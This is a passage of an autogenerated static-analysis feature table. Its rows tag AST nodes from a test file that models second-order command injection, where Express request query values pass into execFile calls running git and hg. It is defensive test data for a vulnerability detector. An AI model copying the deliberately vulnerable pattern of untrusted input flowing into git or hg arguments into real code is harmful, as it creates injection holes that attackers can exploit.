autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:29:19:29:32 | req.query.args | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:29:19:29:32 | req.query.args | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:29:23:29:27 | query | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:29:23:29:27 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:29:23:29:27 | query | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:29:23:29:27 | query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:29:23:29:27 | query | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:29:29:29:32 | args | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:29:29:29:32 | args | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:29:29:29:32 | args | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:29:29:29:32 | args | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:29:29:29:32 | args | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:31:3:31:10 | execFile | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:31:3:31:10 | execFile | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:31:3:31:10 | execFile | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:31:3:31:10 | execFile | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:31:3:31:10 | execFile | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:31:3:31:42 | exceptional return of execFil ... .args]) | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:31:3:31:42 | exceptional return of execFil ... .args]) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:31:3:31:42 | exceptional return of execFil ... .args]) | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:31:3:31:42 | exceptional return of execFil ... .args]) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:31:3:31:42 | exceptional return of execFil ... .args]) | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:31:3:31:42 | execFil ... .args]) | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:31:3:31:42 | execFil ... .args]) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:31:3:31:42 | execFil ... .args]) | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:31:3:31:42 | execFil ... .args]) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:31:3:31:42 | execFil ... .args]) | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:31:12:31:16 | "git" | CalleeFlexibleAccessPath | execFile | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:31:12:31:16 | "git" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:31:12:31:16 | "git" | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:31:12:31:16 | "git" | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:31:12:31:16 | "git" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:31:12:31:16 | "git" | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:31:12:31:16 | "git" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:31:12:31:16 | "git" | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:31:19:31:41 | ["add", ... y.args] | CalleeFlexibleAccessPath | execFile | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:31:19:31:41 | ["add", ... y.args] | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:31:19:31:41 | ["add", ... y.args] | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:31:19:31:41 | ["add", ... y.args] | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:31:19:31:41 | ["add", ... y.args] | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:31:19:31:41 | ["add", ... y.args] | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:31:19:31:41 | ["add", ... y.args] | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:31:19:31:41 | ["add", ... y.args] | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:31:20:31:24 | "add" | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:31:20:31:24 | "add" | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:31:20:31:24 | "add" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:31:20:31:24 | "add" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:31:20:31:24 | "add" | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:31:20:31:24 | "add" | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:31:20:31:24 | "add" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:31:20:31:24 | "add" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:31:20:31:24 | "add" | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:31:20:31:24 | "add" | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:31:27:31:29 | req | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:31:27:31:29 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:31:27:31:29 | req | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:31:27:31:29 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:31:27:31:29 | req | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:31:27:31:35 | req.query | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:31:27:31:35 | req.query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:31:27:31:35 | req.query | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:31:27:31:35 | req.query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:31:27:31:35 | req.query | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:31:27:31:40 | req.query.args | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:31:27:31:40 | req.query.args | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:31:27:31:40 | req.query.args | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:31:27:31:40 | req.query.args | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:31:27:31:40 | req.query.args | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:31:27:31:40 | req.query.args | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:31:27:31:40 | req.query.args | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:31:27:31:40 | req.query.args | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:31:27:31:40 | req.query.args | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:31:27:31:40 | req.query.args | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:31:31:31:35 | query | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:31:31:31:35 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:31:31:31:35 | query | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:31:31:31:35 | query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:31:31:31:35 | query | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:31:37:31:40 | args | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:31:37:31:40 | args | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:31:37:31:40 | args | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:31:37:31:40 | args | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:31:37:31:40 | args | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:3:33:10 | execFile | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:3:33:10 | execFile | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:3:33:10 | execFile | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:3:33:10 | execFile | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:3:33:10 | execFile | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:3:33:66 | exceptional return of execFil ... gs()])) | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:3:33:66 | exceptional return of execFil ... gs()])) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:3:33:66 | exceptional return of execFil ... gs()])) | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:3:33:66 | exceptional return of execFil ... gs()])) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:3:33:66 | exceptional return of execFil ... gs()])) | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:3:33:66 | execFil ... gs()])) | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:3:33:66 | execFil ... gs()])) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:3:33:66 | execFil ... gs()])) | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:3:33:66 | execFil ... gs()])) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:3:33:66 | execFil ... gs()])) | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:12:33:16 | "git" | CalleeFlexibleAccessPath | execFile | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:12:33:16 | "git" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:12:33:16 | "git" | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:12:33:16 | "git" | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:12:33:16 | "git" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:12:33:16 | "git" | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:12:33:16 | "git" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:12:33:16 | "git" | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:19:33:43 | ["add", ... remote] | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:19:33:43 | ["add", ... remote] | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:19:33:43 | ["add", ... remote] | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:19:33:43 | ["add", ... remote] | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:19:33:43 | ["add", ... remote] | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:19:33:50 | ["add", ... .concat | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:19:33:50 | ["add", ... .concat | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:19:33:50 | ["add", ... .concat | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:19:33:50 | ["add", ... .concat | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:19:33:50 | ["add", ... .concat | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:19:33:65 | ["add", ... rgs()]) | CalleeFlexibleAccessPath | execFile | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:19:33:65 | ["add", ... rgs()]) | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:19:33:65 | ["add", ... rgs()]) | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:19:33:65 | ["add", ... rgs()]) | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:19:33:65 | ["add", ... rgs()]) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:19:33:65 | ["add", ... rgs()]) | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:19:33:65 | ["add", ... rgs()]) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:19:33:65 | ["add", ... rgs()]) | 